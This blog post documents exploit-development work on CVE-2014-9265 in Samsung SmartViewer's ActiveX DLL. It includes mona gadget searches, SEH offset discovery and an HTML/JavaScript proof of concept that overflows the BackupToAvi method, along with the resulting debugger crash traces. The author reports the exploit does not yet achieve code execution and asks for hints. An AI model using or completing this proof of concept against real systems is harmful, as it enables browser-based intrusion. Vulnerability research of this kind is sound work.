This blog is about
CVE-2014-9265.
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265
What Samsung says about the software
"SmartViewer is DVR management software that enables you to connect to and control a remote Samsung DVR on your PC via the network. With this tool, you can access Samsung DVRs anywhere around the world via the network, and check the video data from the connected cameras. You can also search for and play recording data in the DVR on a remote site, which will be an effective and convenient monitoring system."
Lets load single vulnerable DLL ,
C:\Program Files\Samsung\SmartViewer3.0\Bin\CNC_Ctrl_STW.dll into ImmunityDBG.
mona plugins help can be viewed with below command
!mona
modules / mod | Show all loaded modules and their properties
unicodealign / ua | Generate venetian alignment code for unicode stack buffer overflow
Displays the list of all the loaded modules and their properties (ASLR, SafeSEH etc).
!mona modules
0BADF00D ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D Module info :
0BADF00D ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
0BADF00D ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D 0x774d0000 | 0x7754b000 | 0x0007b000 | True | True | True | True | True | 6.1.7600.16385 [COMDLG32.dll](C:\Windows\system32\COMDLG32.dll)
0BADF00D 0x10000000 | 0x1017b000 | 0x0017b000 | False | False | False | False | False | 2.0.1.6 [CNC_Ctrl_STW.dll] (C:\Program Files\Samsung\SmartViewer3.0\Bin\CNC_Ctrl_STW.dll)
0BADF00D 0x75c60000 | 0x75d34000 | 0x000d4000 | True | True | True | True | True | 6.1.7600.16385 [kernel32.dll] (C:\Windows\system32\kernel32.dll)
!mona ua
will generate
venetian_alignment.txt at C:\Program Files\Immunity Inc\Immunity Debugger\
mona command to search for addresses with pop/pop/ret
!mona findwild -s "pop r32#*#pop r32#*#retn"
Above command will generate
findwild.txt file located at
C:\Program Files\Immunity Inc\Immunity Debugger\
Only one address(shown below) which has unicode compatibility is useful to us.
0x10008700 : pop ecx # mov eax,esi # pop esi # retn 4 | null,unicodereverse {PAGE_EXECUTE_READ} [CNC_Ctrl_STW.dll] ASLR: False, Rebase: False, SafeSEH:
False, OS: False, v2.0.1.6 (C:\Program Files\Samsung\SmartViewer3.0\Bin\CNC_Ctrl_STW.dll)
Conditional breakpoint can be set using, assuming EIP holds 0x10008700 though EIP is having 0x00100087
bp 10008700 "j @eip=0x10008700 ; 'g' "
Finding offset to EIP
Initially pass a character string of length 15000 to BackupToAvi API, use Metasploit cyclic pattern to find the offset where EIP is overwritten, in my case it is offset 156. To find offset execute !exchain", search for the characters located at address 0x045ad62c, im metasploit cyclic pattern to get the offset.
Once we know the offset to seh, nseh we can write a PoC as shown below
<html>
<head> Samsung SmartViewer BackupToAvi Remote Code Execution</head>
<title> PoC developed by Praveen Darshanam </title>
<object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target' >
</object>
<script >
var payload_length = 15000;
var arg1=1;
var arg2=1;
var arg3=1;
//blank strings
var junk = "";
var buf1 = "";
var buf2 = "";
//offset to SE is 156, initial analysis using metasploit cyclic pattern
for (i=0; i<156; i++)
{
buf1 += "A";
}
var nseh = "DD";
//vulnerable DLL
var seh = "\x87\x10"; //pop, pop, ret
junk = buf1 + nseh + seh;
//remaining buffer
for (j=0; j<(payload_length-junk.length); j++)
{
buf2 += "B";
}
var fbuff = junk + buf2;
target.BackupToAvi(arg1 ,arg2 ,arg3 ,fbuff);
</script>
</html>
When we open above html file in browser, we get below trace
Tested on Windows 7 Ultimate N SP1 using Internet Explorer 8)
(c6c.418): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=00450045 edx=773771cd esi=00000000 edi=00000000
eip=00450045 esp=043b10a8 ebp=043b10c8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
00450045 ?? ???
0:005> !exchain
....
045abacc: ntdll!ExecuteHandler2+3a (773771cd)
045abeb4: ntdll!ExecuteHandler2+3a (773771cd)
045ac29c: ntdll!ExecuteHandler2+3a (773771cd)
045ac684: ntdll!ExecuteHandler2+3a (773771cd)
045ad62c: 00450045
Invalid exception stack at 00440044
0:005> d 045ad62c
045ad62c
44 00 44 00 45 00 45 00-42 00 42 00 42 00 42 00 D.D.E.E.B.B.B.B.
045ad63c 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
045ad64c 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
045ad65c 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
045ad66c 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
045ad67c 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
045ad68c 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
045ad69c 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
Couldn't write working exploit because of the issues mentioned below.
Issue1:
None of the registers are pointing to controlled buffer at the time of crash, can be verified using "d reg_name" on windbg cli where reg_name might be eax, ebx, esp, edi etc.
var nseh = "DD";
var seh = "\x87\x10"; //0x10008700
045ad62c 44 00 44 00
87 00 10 00-42 00 42 00 42 00 42 00 D.D.....B.B.B.B.
Issue2:
0x10008700 points to pop/pop/ret but eip is getting 0x00100087 instead of 0x10008700
Facing issue 2 on Windows XP Pro SP3 also
0:008> !exchain
020bf798: 00100087
Invalid exception stack at 00440044
0:008> d 020bf798
020bf798
44 00 44 00 87 00 10 00-42 00 42 00 42 00 42 00 D.D.....B.B.B.B.
020bf7a8 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
020bf7b8 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
020bf7c8 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
020bf7d8 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
020bf7e8 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
020bf7f8 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
020bf808 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
Any hints to develop working exploit are most welcome!